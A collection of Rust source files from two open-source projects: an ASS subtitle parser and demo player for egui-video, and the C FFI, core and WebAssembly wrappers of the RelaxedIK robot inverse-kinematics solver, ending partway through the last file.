            Ok(5) => Ok(SubtitleField::Alignment(Align2::CENTER_CENTER)),
            Ok(6) => Ok(SubtitleField::Alignment(Align2::RIGHT_CENTER)),
            Ok(7) => Ok(SubtitleField::Alignment(Align2::LEFT_TOP)),
            Ok(8) => Ok(SubtitleField::Alignment(Align2::CENTER_TOP)),
            Ok(9) => Ok(SubtitleField::Alignment(Align2::RIGHT_TOP)),
            _ => bail!("invalid alignment"),
        }),
    )(i)
}
/// Parses an ASS `\pos(x,y)` tag into an absolute subtitle position.
fn pos(i: &str) -> IResult<&str, SubtitleField> {
    preceded(
        tag(r"\pos"),
        map(map_res(num_list, tuple_float_2), |p| {
            SubtitleField::Position(Pos2::new(p.0 as f32, p.1 as f32))
        }),
    )(i)
}
// color parsing credit: example on https://github.com/rust-bakery/nom/tree/main
/// Converts a two-digit hexadecimal string into its byte value.
fn from_hex(i: &str) -> Result<u8> {
    u8::from_str_radix(i, 16).map_err(Into::into)
}
/// Parses exactly two hex digits into one color-channel byte.
fn hex_primary(i: &str) -> IResult<&str, u8> {
    map_res(take_while_m_n(2, 2, |c: char| c.is_hex_digit()), from_hex)(i)
}
/// Parses a 6-digit hex color. The channels are read blue-first (ASS stores
/// colors as `BBGGRR`) and reassembled into an RGB [`Color32`].
fn hex_to_color32(i: &str) -> IResult<&str, Color32> {
    let (i, (blue, green, red)) = tuple((hex_primary, hex_primary, hex_primary))(i)?;
    Ok((i, Color32::from_rgb(red, green, blue)))
}
/// Parses an ASS primary-fill color tag (`\c&H...&` or `\1c&H...&`).
fn c(i: &str) -> IResult<&str, SubtitleField> {
    delimited(
        alt((tag(r"\c&H"), tag(r"\1c&H"))),
        map(hex_to_color32, SubtitleField::PrimaryFill),
        tag("&"),
    )(i)
}
/// Consumes any unrecognized `\tag` (up to the next `\` or `}`) so the rest of
/// the override block can still be parsed.
fn undefined(i: &str) -> IResult<&str, SubtitleField> {
    map(
        preceded(char('\\'), take_till(|c| "}\\".contains(c))),
        SubtitleField::Undefined,
    )(i)
}
/// Parses a `{...}` override block into a [`Subtitle`], applying each
/// recognized tag onto a default subtitle. Unrecognized tags are skipped, and
/// any trailing unparsed text before `}` is discarded.
fn parse_style(i: &str) -> IResult<&str, Subtitle> {
    let (i, subtitle_style_components) = delimited(
        char('{'),
        many0(alt((t, fad, an, pos, c, undefined))),
        tuple((take_until("}"), char('}'))),
    )(i)?;
    let mut subtitle = Subtitle::default();
    // Fold parsed fields into the subtitle; later tags override earlier ones.
    for component in subtitle_style_components {
        match component {
            SubtitleField::Fade(fade) => subtitle.fade = fade,
            SubtitleField::Alignment(alignment) => subtitle.alignment = alignment,
            SubtitleField::PrimaryFill(primary_fill) => subtitle.primary_fill = primary_fill,
            SubtitleField::Position(position) => subtitle.position = Some(position),
            SubtitleField::Undefined(_) => (),
        }
    }
    Ok((i, subtitle))
}
/// Parses the final `Text` field of a Dialogue line: an optional `{...}`
/// style-override block followed by the subtitle text. ASS soft line breaks
/// (`\N`) are expanded into real newlines.
fn text_field(i: &str) -> IResult<&str, Subtitle> {
    let (i, (subtitle, subtitle_text)) = preceded(opt_comma, pair(opt(parse_style), rest))(i)?;
    let mut subtitle = subtitle.unwrap_or_default();
    subtitle.text = subtitle_text.replace(r"\N", "\n");
    Ok((i, subtitle))
}
/// Matches one or more characters up to (not including) the next comma.
fn not_comma(i: &str) -> IResult<&str, &str> {
    is_not(",")(i)
}
/// Matches a single comma separator.
fn comma(i: &str) -> IResult<&str, char> {
    char(',')(i)
}
/// Optionally consumes a leading comma (first field has none).
fn opt_comma(i: &str) -> IResult<&str, Option<char>> {
    opt(comma)(i)
}
/// Parses one optional comma-separated string field; empty fields yield `None`.
fn string_field(i: &str) -> IResult<&str, Option<String>> {
    preceded(
        opt_comma,
        map(opt(not_comma), |s| s.map(String::from)),
    )(i)
}
/// Parses one comma-separated integer field.
fn num_field(i: &str) -> IResult<&str, i32> {
    preceded(opt_comma, map_res(digit0, str::parse))(i)
}
/// Parses an ffmpeg-provided ASS Dialogue payload of the form
/// `Layer,Start,Style,Name,MarginL,MarginR,MarginV,Effect,Text` into a
/// [`Subtitle`]. All leading fields are currently parsed but discarded; only
/// the trailing style override and text are used.
pub(crate) fn parse_ass_subtitle(i: &str) -> Result<Subtitle> {
    let (_i, (_layer, _start, _style, _name, _margin_l, _margin_r, _margin_v, _effect, subtitle)) =
        tuple((
            context("layer", num_field),
            context("start", num_field),
            context("style", string_field),
            context("name", string_field),
            context("margin_l", num_field),
            context("margin_r", num_field),
            context("margin_v", num_field),
            context("effect", string_field),
            context("style override + text", text_field),
        ))(i)
        // Convert the borrowed nom error into an owned anyhow error.
        .map_err(|e| anyhow!(format!("subtitle parse failed: {e}")))?;
    Ok(subtitle)
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/subtitle/mod.rs | src/subtitle/mod.rs | use anyhow::Result;
use egui::{Align2, Color32, Margin, Pos2};
use self::ass::parse_ass_subtitle;
mod ass;
/// A single subtitle entry, parsed from an ASS or plain-text subtitle rect.
#[derive(Debug)]
pub struct Subtitle {
    /// Text to draw (ASS `\N` breaks already expanded to newlines).
    pub text: String,
    /// Fade effect parsed from `\fad` (fields currently unused by rendering).
    pub fade: FadeEffect,
    /// Text anchor/alignment.
    pub alignment: Align2,
    /// Primary fill color of the text.
    pub primary_fill: Color32,
    /// Absolute position from `\pos`, if given; `None` means auto-placement.
    pub position: Option<Pos2>,
    /// Font size, in native video-frame coordinates.
    pub font_size: f32,
    /// Margins applied when auto-placing the subtitle.
    pub margin: Margin,
    /// Remaining on-screen time; the player decrements this each frame.
    pub remaining_duration_ms: i64,
}
// todo, among others
// struct Transition<'a> {
// offset_start_ms: i64,
// offset_end_ms: i64,
// accel: f64,
// field: SubtitleField<'a>,
// }
/// One parsed ASS override-tag value, before being folded into a [`Subtitle`].
enum SubtitleField<'a> {
    Fade(FadeEffect),
    Alignment(Align2),
    PrimaryFill(Color32),
    Position(Pos2),
    /// Text of an unrecognized tag, kept only so parsing can continue.
    #[allow(unused)]
    Undefined(&'a str),
}
/// Fade-in/out durations parsed from an ASS `\fad` tag (not yet rendered).
#[derive(Debug, Default)]
pub struct FadeEffect {
    _fade_in_ms: i64,
    _fade_out_ms: i64,
}
impl Default for Subtitle {
fn default() -> Self {
Self {
text: String::new(),
fade: FadeEffect {
_fade_in_ms: 0,
_fade_out_ms: 0,
},
remaining_duration_ms: 0,
font_size: 30.,
margin: Margin::same(85.),
alignment: Align2::CENTER_CENTER,
primary_fill: Color32::WHITE,
position: None,
}
}
}
impl Subtitle {
    /// Builds a default-styled subtitle holding `text`.
    fn from_text(text: &str) -> Self {
        Subtitle::default().with_text(text)
    }
    /// Replaces the subtitle text (builder style).
    pub(crate) fn with_text(mut self, text: &str) -> Self {
        self.text = String::from(text);
        self
    }
    /// Sets how long the subtitle stays on screen (builder style).
    pub(crate) fn with_duration_ms(mut self, duration_ms: i64) -> Self {
        self.remaining_duration_ms = duration_ms;
        self
    }
    /// Converts one ffmpeg subtitle rect into a [`Subtitle`]:
    /// ASS rects are fully parsed, plain-text rects get default styling,
    /// bitmap rects are unsupported (short placeholder message), and `None`
    /// rects are an error.
    pub(crate) fn from_ffmpeg_rect(rect: ffmpeg::subtitle::Rect) -> Result<Self> {
        match rect {
            ffmpeg::subtitle::Rect::Ass(ass) => parse_ass_subtitle(ass.get()),
            ffmpeg::subtitle::Rect::Bitmap(_bitmap) => {
                Ok(Subtitle::from_text("[ unsupported bitmap subtitle ]").with_duration_ms(500))
            }
            ffmpeg::subtitle::Rect::None(_none) => anyhow::bail!("no subtitle"),
            ffmpeg::subtitle::Rect::Text(text) => Ok(Subtitle::from_text(text.get())),
        }
    }
}
impl FadeEffect {
    /// Returns `true` when both fade durations are zero, i.e. no fade at all.
    fn _is_zero(&self) -> bool {
        matches!((self._fade_in_ms, self._fade_out_ms), (0, 0))
    }
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/examples/main.rs | examples/main.rs | use eframe::NativeOptions;
use egui::{CentralPanel, DragValue, Grid, Sense, Slider, TextEdit, Window};
use egui_video::{AudioDevice, Player};
/// Entry point: opens an eframe window running the demo [`App`].
fn main() {
    // Any error from the native runner is deliberately ignored in this example.
    let _ = eframe::run_native(
        "app",
        NativeOptions::default(),
        Box::new(|_| Ok(Box::new(App::default()))),
    );
}
/// Demo application state.
struct App {
    /// Audio output device shared by players created during the session.
    audio_device: AudioDevice,
    /// The currently loaded player, if any.
    player: Option<Player>,
    /// Path of the media file to load.
    media_path: String,
    /// Multiplier applied to the native video size when drawing.
    stream_size_scale: f32,
    /// Seek target as a fraction of the media duration (0..=1).
    seek_frac: f32,
}
impl Default for App {
    /// Fresh state: a working audio device, nothing loaded yet, 1:1 scale.
    fn default() -> Self {
        Self {
            audio_device: AudioDevice::new().unwrap(),
            player: None,
            media_path: String::default(),
            stream_size_scale: 1.,
            seek_frac: 0.,
        }
    }
}
impl eframe::App for App {
    /// Per-frame UI: a path picker / load-clear row on top, then (when a
    /// player is loaded) an info window, a controls window, and the video.
    fn update(&mut self, ctx: &egui::Context, _frame: &mut eframe::Frame) {
        // Repaint continuously so video frames keep advancing.
        ctx.request_repaint();
        CentralPanel::default().show(ctx, |ui| {
            ui.horizontal(|ui| {
                // "load": create a player (with audio + subtitles) from the path.
                ui.add_enabled_ui(!self.media_path.is_empty(), |ui| {
                    if ui.button("load").clicked() {
                        match Player::new(ctx, &self.media_path.replace("\"", "")).and_then(|p| {
                            p.with_audio(&mut self.audio_device)
                                .and_then(|p| p.with_subtitles())
                        }) {
                            Ok(player) => {
                                self.player = Some(player);
                            }
                            Err(e) => println!("failed to make stream: {e}"),
                        }
                    }
                });
                // "clear": drop the current player.
                ui.add_enabled_ui(!self.media_path.is_empty(), |ui| {
                    if ui.button("clear").clicked() {
                        self.player = None;
                    }
                });
                // Read-only path display; clicking it opens a file dialog.
                let tedit_resp = ui.add_sized(
                    [ui.available_width(), ui.available_height()],
                    TextEdit::singleline(&mut self.media_path)
                        .hint_text("click to set path")
                        .interactive(false),
                );
                if ui
                    .interact(
                        tedit_resp.rect,
                        tedit_resp.id.with("click_sense"),
                        Sense::click(),
                    )
                    .clicked()
                {
                    if let Some(path_buf) = rfd::FileDialog::new()
                        .add_filter("videos", &["mp4", "gif", "webm", "mkv", "ogg"])
                        .pick_file()
                    {
                        self.media_path = path_buf.as_path().to_string_lossy().to_string();
                    }
                }
            });
            ui.separator();
            if let Some(player) = self.player.as_mut() {
                // Read-only stream diagnostics.
                Window::new("info").show(ctx, |ui| {
                    Grid::new("info_grid").show(ui, |ui| {
                        ui.label("frame rate");
                        ui.label(player.framerate.to_string());
                        ui.end_row();
                        ui.label("size");
                        ui.label(format!("{}x{}", player.size.x, player.size.y));
                        ui.end_row();
                        ui.label("elapsed / duration");
                        ui.label(player.duration_text());
                        ui.end_row();
                        ui.label("state");
                        ui.label(format!("{:?}", player.player_state.get()));
                        ui.end_row();
                        ui.label("has audio?");
                        ui.label(player.audio_streamer.is_some().to_string());
                        ui.end_row();
                        ui.label("has subtitles?");
                        ui.label(player.subtitle_streamer.is_some().to_string());
                        ui.end_row();
                    });
                });
                // Transport + volume controls.
                Window::new("controls").show(ctx, |ui| {
                    ui.horizontal(|ui| {
                        if ui.button("seek to:").clicked() {
                            player.seek(self.seek_frac);
                        }
                        ui.add(
                            DragValue::new(&mut self.seek_frac)
                                .speed(0.05)
                                .range(0.0..=1.0),
                        );
                        ui.checkbox(&mut player.options.looping, "loop");
                    });
                    ui.horizontal(|ui| {
                        ui.label("size scale");
                        ui.add(Slider::new(&mut self.stream_size_scale, 0.0..=2.));
                    });
                    ui.separator();
                    ui.horizontal(|ui| {
                        if ui.button("play").clicked() {
                            player.start()
                        }
                        if ui.button("unpause").clicked() {
                            player.resume();
                        }
                        if ui.button("pause").clicked() {
                            player.pause();
                        }
                        if ui.button("stop").clicked() {
                            player.stop();
                        }
                    });
                    ui.horizontal(|ui| {
                        ui.label("volume");
                        let mut volume = player.options.audio_volume.get();
                        if ui
                            .add(Slider::new(
                                &mut volume,
                                0.0..=player.options.max_audio_volume,
                            ))
                            .changed()
                        {
                            player.options.audio_volume.set(volume);
                        };
                    });
                });
                // Finally, draw the video itself (scaled).
                player.ui(ui, player.size * self.stream_size_scale);
            }
        });
    }
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik_wrapper.rs | src/relaxed_ik_wrapper.rs | use crate::relaxed_ik::{RelaxedIK, Opt};
use std::sync::{Arc, Mutex};
use nalgebra::{Vector3, Vector6, UnitQuaternion, Quaternion,Translation3, Isometry3};
use std::os::raw::{*};
use std::str;
use crate::utils_rust::file_utils::{*};
// http://jakegoulding.com/rust-ffi-omnibus/objects/
/// Allocates a `RelaxedIK` solver on the heap and returns an owning raw
/// pointer. A null `path_to_setting` falls back to `configs/settings.yaml`
/// under the crate source directory.
///
/// # Safety
/// `path_to_setting` must be null or point to a valid NUL-terminated C
/// string. The returned pointer must eventually be released with
/// `relaxed_ik_free`.
#[no_mangle]
pub unsafe extern "C" fn relaxed_ik_new(path_to_setting: *const c_char) -> *mut RelaxedIK {
    if path_to_setting.is_null()
    {
        let path_to_src = get_path_to_src();
        let default_path_to_setting = path_to_src + "configs/settings.yaml";
        return Box::into_raw(Box::new(RelaxedIK::load_settings(default_path_to_setting.as_str())))
    }
    let c_str = std::ffi::CStr::from_ptr(path_to_setting);
    // Panics on non-UTF-8 paths; acceptable at this FFI boundary today.
    let path_to_setting_str = c_str.to_str().expect("Not a valid UTF-8 string");
    Box::into_raw(Box::new(RelaxedIK::load_settings(path_to_setting_str)))
}
/// Destroys a `RelaxedIK` instance created by `relaxed_ik_new`.
/// A null pointer is a no-op.
///
/// # Safety
/// `ptr` must be null or a pointer obtained from `relaxed_ik_new` that has
/// not already been freed; anything else is undefined behavior.
#[no_mangle]
pub unsafe extern "C" fn relaxed_ik_free(ptr: *mut RelaxedIK) {
    if ptr.is_null() { return }
    // Rebuild the Box and drop it explicitly so the deallocation intent is
    // clear (a bare `Box::from_raw(ptr);` relies on an implicit drop and
    // draws an unused-value lint on newer toolchains).
    drop(Box::from_raw(ptr));
}
/// Resets the solver to the supplied joint configuration.
///
/// # Safety
/// `ptr` must be a valid pointer from `relaxed_ik_new`; `joint_state` must
/// point to at least `joint_state_length` readable doubles.
#[no_mangle]
pub unsafe extern "C" fn reset(ptr: *mut RelaxedIK, joint_state: *const c_double, joint_state_length: c_int) {
    let relaxed_ik = unsafe {
        assert!(!ptr.is_null());
        &mut *ptr
    };
    // Copy the C buffer into an owned Vec before handing it to the solver.
    let x_slice: &[c_double] = std::slice::from_raw_parts(joint_state, joint_state_length as usize);
    let x_vec = x_slice.to_vec();
    relaxed_ik.reset(x_vec);
}
/// Solves for absolute end-effector pose goals.
///
/// Expects, per kinematic chain: 3 position values, 4 quaternion values, and
/// 6 tolerance values (lengths are asserted). The returned `Opt` buffer is
/// intentionally leaked (`mem::forget`) and becomes owned by the caller.
///
/// # Safety
/// `ptr` must come from `relaxed_ik_new`; each goal pointer must reference at
/// least its stated number of readable doubles.
#[no_mangle]
pub unsafe extern "C" fn solve_position(ptr: *mut RelaxedIK, pos_goals: *const c_double, pos_length: c_int,
                                        quat_goals: *const c_double, quat_length: c_int,
                                        tolerance: *const c_double, tolerance_length: c_int) -> Opt {
    let relaxed_ik = unsafe {
        assert!(!ptr.is_null());
        &mut *ptr
    };
    assert!(!pos_goals.is_null(), "Null pointer for pos goals!");
    assert!(!quat_goals.is_null(), "Null pointer for quat goals!");
    assert!(!tolerance.is_null(), "Null pointer for tolerance!");
    assert!(pos_length as usize == relaxed_ik.vars.robot.num_chains * 3 ,
            "Pos vels are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 3, pos_length);
    assert!(quat_length as usize == relaxed_ik.vars.robot.num_chains * 4,
            "Rot vels are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 4, quat_length);
    assert!(tolerance_length as usize == relaxed_ik.vars.robot.num_chains * 6,
            "Tolerance are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 6, tolerance_length);
    let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_goals, pos_length as usize);
    let quat_slice: &[c_double] = std::slice::from_raw_parts(quat_goals, quat_length as usize);
    let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
    let pos_vec = pos_slice.to_vec();
    let quat_vec = quat_slice.to_vec();
    let tolerance_vec = tolerance_slice.to_vec();
    let ja = solve_position_helper(relaxed_ik, pos_vec, quat_vec, tolerance_vec);
    let ptr = ja.as_ptr();
    let len = ja.len();
    // Leak the Vec so the raw pointer handed to C stays valid.
    std::mem::forget(ja);
    Opt {data: ptr, length: len as c_int}
}
/// Solves after applying per-chain velocity deltas to the current goals.
///
/// Expects, per kinematic chain: 3 translational values, 3 rotational
/// (scaled-axis) values, and 6 tolerance values (lengths are asserted). The
/// returned `Opt` buffer is leaked and becomes owned by the caller.
///
/// # Safety
/// `ptr` must come from `relaxed_ik_new`; each input pointer must reference
/// at least its stated number of readable doubles.
#[no_mangle]
pub unsafe extern "C" fn solve_velocity(ptr: *mut RelaxedIK, pos_vels: *const c_double, pos_length: c_int,
                                        rot_vels: *const c_double, rot_length: c_int,
                                        tolerance: *const c_double, tolerance_length: c_int) -> Opt {
    let relaxed_ik = unsafe {
        assert!(!ptr.is_null());
        &mut *ptr
    };
    assert!(!pos_vels.is_null(), "Null pointer for pos vels!");
    assert!(!rot_vels.is_null(), "Null pointer for rot vels!");
    assert!(!tolerance.is_null(), "Null pointer for tolerance!");
    assert!(pos_length as usize == relaxed_ik.vars.robot.num_chains * 3 ,
            "Pos vels are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 3, pos_length);
    assert!(rot_length as usize == relaxed_ik.vars.robot.num_chains * 3,
            "Rot vels are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 3, rot_length);
    assert!(tolerance_length as usize == relaxed_ik.vars.robot.num_chains * 6,
            "Tolerance are expected to have {} numbers, but got {}",
            relaxed_ik.vars.robot.num_chains * 6, tolerance_length);
    let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_vels, pos_length as usize);
    let rot_slice: &[c_double] = std::slice::from_raw_parts(rot_vels, rot_length as usize);
    let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
    let pos_vec = pos_slice.to_vec();
    let rot_vec = rot_slice.to_vec();
    let tolerance_vec = tolerance_slice.to_vec();
    let ja = solve_velocity_helper(relaxed_ik, pos_vec, rot_vec, tolerance_vec);
    let ptr = ja.as_ptr();
    let len = ja.len();
    // Leak the Vec so the raw pointer handed to C stays valid.
    std::mem::forget(ja);
    Opt {data: ptr, length: len as c_int}
}
/// Returns the solver's stored goal positions, flattened as
/// `[x0, y0, z0, x1, y1, z1, ...]`, one triple per chain.
///
/// NOTE(review): despite the name, this reads `vars.goal_positions`, not
/// forward-kinematics end-effector positions. The returned buffer is leaked
/// and owned by the caller.
///
/// # Safety
/// `ptr` must be a valid pointer obtained from `relaxed_ik_new`.
#[no_mangle]
pub unsafe extern "C" fn get_ee_positions(ptr: *mut RelaxedIK) -> Opt {
    let relaxed_ik = unsafe {
        assert!(!ptr.is_null());
        &mut *ptr
    };
    // Flatten each goal position into three consecutive doubles.
    let positions: Vec<f64> = relaxed_ik
        .vars
        .goal_positions
        .iter()
        .flat_map(|p| vec![p.x, p.y, p.z])
        .collect();
    let data = positions.as_ptr();
    let len = positions.len();
    // Leak the Vec so the raw pointer handed to C stays valid.
    std::mem::forget(positions);
    Opt { data, length: len as c_int }
}
// This is mainly for backward compatibility
/// Backward-compatible alias of `solve_position` that skips the per-chain
/// length assertions. The returned `Opt` buffer is leaked and owned by the
/// caller.
///
/// # Safety
/// Same requirements as `solve_position`; additionally the caller is
/// responsible for passing correctly sized buffers, since lengths are not
/// validated here.
#[no_mangle]
pub unsafe extern "C" fn solve(ptr: *mut RelaxedIK, pos_goals: *const c_double, pos_length: c_int,
                               quat_goals: *const c_double, quat_length: c_int,
                               tolerance: *const c_double, tolerance_length: c_int) -> Opt {
    let relaxed_ik = unsafe {
        assert!(!ptr.is_null());
        &mut *ptr
    };
    assert!(!pos_goals.is_null(), "Null pointer for pos goals!");
    assert!(!quat_goals.is_null(), "Null pointer for quat goals!");
    assert!(!tolerance.is_null(), "Null pointer for tolerance!");
    let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_goals, pos_length as usize);
    let quat_slice: &[c_double] = std::slice::from_raw_parts(quat_goals, quat_length as usize);
    let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
    let pos_vec = pos_slice.to_vec();
    let quat_vec = quat_slice.to_vec();
    let tolerance_vec = tolerance_slice.to_vec();
    let ja = solve_position_helper(relaxed_ik, pos_vec, quat_vec, tolerance_vec);
    let ptr = ja.as_ptr();
    let len = ja.len();
    // Leak the Vec so the raw pointer handed to C stays valid.
    std::mem::forget(ja);
    Opt {data: ptr, length: len as c_int}
}
/// Writes per-chain absolute pose goals into the solver vars, then solves.
///
/// Layout per chain: `pos_goals` holds 3 values; `quat_goals` holds 4 values
/// in `[x, y, z, w]` order (nalgebra's `Quaternion::new` takes `w` first,
/// hence index `4*i+3` leading); `tolerance` holds 6 values.
fn solve_position_helper(relaxed_ik: &mut RelaxedIK, pos_goals: Vec<f64>, quat_goals: Vec<f64>,
                    tolerance: Vec<f64>) -> Vec<f64> {
    for i in 0..relaxed_ik.vars.robot.num_chains {
        relaxed_ik.vars.goal_positions[i] = Vector3::new(pos_goals[3*i], pos_goals[3*i+1], pos_goals[3*i+2]);
        let tmp_q = Quaternion::new(quat_goals[4*i+3], quat_goals[4*i], quat_goals[4*i+1], quat_goals[4*i+2]);
        relaxed_ik.vars.goal_quats[i] = UnitQuaternion::from_quaternion(tmp_q);
        relaxed_ik.vars.tolerances[i] = Vector6::new( tolerance[6*i], tolerance[6*i+1], tolerance[6*i+2],
            tolerance[6*i+3], tolerance[6*i+4], tolerance[6*i+5])
    }
    let x = relaxed_ik.solve();
    return x;
}
/// Integrates per-chain velocity commands into the pose goals, then solves.
///
/// Layout per chain: `pos_vels` and `rot_vels` each hold 3 values (a
/// translation delta and a scaled-axis rotation delta); `tolerance` holds 6
/// values, matching the `num_chains * 6` layout asserted by `solve_velocity`.
fn solve_velocity_helper(relaxed_ik: &mut RelaxedIK, pos_vels: Vec<f64>, rot_vels: Vec<f64>,
                    tolerance: Vec<f64>) -> Vec<f64> {
    for i in 0..relaxed_ik.vars.robot.num_chains {
        // Accumulate the translational velocity into the position goal.
        relaxed_ik.vars.goal_positions[i] += Vector3::new(pos_vels[3*i], pos_vels[3*i+1], pos_vels[3*i+2]);
        // Apply the scaled-axis rotation delta on the left of the current goal.
        let axisangle = Vector3::new(rot_vels[3*i], rot_vels[3*i+1], rot_vels[3*i+2]);
        let tmp_q = UnitQuaternion::from_scaled_axis(axisangle);
        let org_q = relaxed_ik.vars.goal_quats[i].clone();
        relaxed_ik.vars.goal_quats[i] = tmp_q * org_q;
        // BUG FIX: tolerances are packed 6 per chain (see the tolerance_length
        // assertion in `solve_velocity` and the stride used by
        // `solve_position_helper`), so the stride must be 6*i — the previous
        // 3*i stride read overlapping/wrong entries for every chain after the
        // first.
        relaxed_ik.vars.tolerances[i] = Vector6::new(
            tolerance[6*i], tolerance[6*i+1], tolerance[6*i+2],
            tolerance[6*i+3], tolerance[6*i+4], tolerance[6*i+5],
        );
    }
    // The old code also computed an end-effector-to-goal distance here and
    // discarded it; that dead forward-kinematics call has been removed.
    relaxed_ik.solve()
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/lib.rs | src/lib.rs | pub mod utils_rust;
pub mod spacetime;
pub mod groove;
pub mod relaxed_ik;
pub mod relaxed_ik_wrapper;
pub mod relaxed_ik_web; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik.rs | src/relaxed_ik.rs | use crate::groove::vars::RelaxedIKVars;
use crate::groove::groove::{OptimizationEngineOpen};
use crate::groove::objective_master::ObjectiveMaster;
use crate::utils_rust::file_utils::{*};
use crate::utils_rust::transformations::{*};
use nalgebra::{Vector3, UnitQuaternion, Quaternion};
use std::os::raw::{c_double, c_int};
/// C-compatible view of a solver result: `data` points to `length` doubles.
/// The producing FFI calls leak the backing buffer, so the caller owns it.
#[repr(C)]
pub struct Opt {
    pub data: *const c_double,
    pub length: c_int,
}
/// The core RelaxedIK solver: runtime variables, the objective set, and the
/// optimization engine that ties them together.
pub struct RelaxedIK {
    pub vars: RelaxedIKVars,
    pub om: ObjectiveMaster,
    pub groove: OptimizationEngineOpen
}
impl RelaxedIK {
pub fn load_settings( path_to_setting: &str) -> Self {
println!("RelaxedIK is using below setting file {}", path_to_setting);
let vars = RelaxedIKVars::from_local_settings(path_to_setting);
let om = ObjectiveMaster::relaxed_ik(&vars.robot.chain_lengths);
let groove = OptimizationEngineOpen::new(vars.robot.num_dofs.clone());
Self{vars, om, groove}
}
pub fn reset(&mut self, x: Vec<f64>) {
self.vars.reset( x.clone());
}
pub fn solve(&mut self) -> Vec<f64> {
let mut out_x = self.vars.xopt.clone();
self.groove.optimize(&mut out_x, &self.vars, &self.om, 100);
let frames = self.vars.robot.get_frames_immutable(&out_x);
for i in 0..out_x.len() {
if (out_x[i].is_nan()) {
println!("No valid solution found! Returning previous solution: {:?}. End effector position goals: {:?}", self.vars.xopt, self.vars.goal_positions);
return self.vars.xopt.clone();
}
}
self.vars.update(out_x.clone());
out_x
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik_web.rs | src/relaxed_ik_web.rs |
use crate::groove::vars::{RelaxedIKVars, VarsConstructorData};
use crate::groove::groove::{OptimizationEngineOpen};
use crate::groove::objective_master::ObjectiveMaster;
use crate::utils_rust::transformations::{*};
use wasm_bindgen::prelude::*;
use js_sys::Array;
extern crate serde_json;
use web_sys;
extern crate console_error_panic_hook;
use nalgebra::{UnitQuaternion, Vector3, Vector6, Quaternion, Point3};
/// WASM-facing wrapper around the RelaxedIK solver stack: runtime variables,
/// the objective set, and the optimization engine.
#[wasm_bindgen]
pub struct RelaxedIK {
    pub(crate) vars: RelaxedIKVars,
    pub(crate) om: ObjectiveMaster,
    pub(crate) groove: OptimizationEngineOpen
}
#[wasm_bindgen]
impl RelaxedIK {
    /// Constructs a solver from a JS config object and a URDF string.
    /// Panics (surfaced on the JS console) if the config cannot be deserialized.
    #[wasm_bindgen(constructor)]
    pub fn new( configs: JsValue, urdf: String) -> Self {
        // Route Rust panics to the browser console for easier debugging.
        console_error_panic_hook::set_once();
        let cfg: VarsConstructorData = serde_wasm_bindgen::from_value(configs).unwrap();
        let vars = RelaxedIKVars::from_jsvalue(cfg, &urdf);
        let om = ObjectiveMaster::relaxed_ik(&vars.robot.chain_lengths);
        let groove = OptimizationEngineOpen::new(vars.robot.num_dofs.clone());
        Self{vars, om, groove}
    }
    /// Resets the solver. A null/undefined `init_state`, or one whose length
    /// does not match the robot's DOF count, falls back to the stored initial
    /// configuration.
    pub fn reset(&mut self, init_state: JsValue) {
        let starting_config = if init_state.is_null() || init_state.is_undefined() {
            self.vars.init_state.clone()
        } else {
            let tmp: Vec<f64> = serde_wasm_bindgen::from_value(init_state).unwrap();
            if tmp.len() != self.vars.robot.num_dofs {
                self.vars.init_state.clone()
            } else {
                tmp
            }
        };
        self.vars.reset( starting_config.clone());
    }
    /// Solves for absolute end-effector pose goals.
    pub fn solve_position(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue) -> Array{
        self.solve_position_helper(pos_goal, quat_goal, tolerance, false)
    }
    /// Solves for pose goals expressed relative to the initial end-effector poses.
    pub fn solve_position_relative(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue) -> Array{
        self.solve_position_helper(pos_goal, quat_goal, tolerance, true)
    }
    /// Backward-compatible alias: relative solve with default tolerances.
    pub fn solve(&mut self, pos_goal: JsValue, quat_goal: JsValue) -> Array{
        self.solve_position_relative(pos_goal, quat_goal, JsValue::undefined())
    }
}
impl RelaxedIK {
/// Shared implementation behind the JS-facing solve entry points.
///
/// `pos_goal` / `quat_goal` are flat JS arrays holding one 3-vector and one
/// 4-component quaternion per kinematic chain. The quaternion is read as
/// [w, x, y, z] (nalgebra's `Quaternion::new` order) — assumes the JS caller
/// sends components in that order; confirm if the frontend changes.
/// `tolerance` is an optional flat array of 6 values (3 translational,
/// 3 rotational) per chain; null/undefined means exact goals.
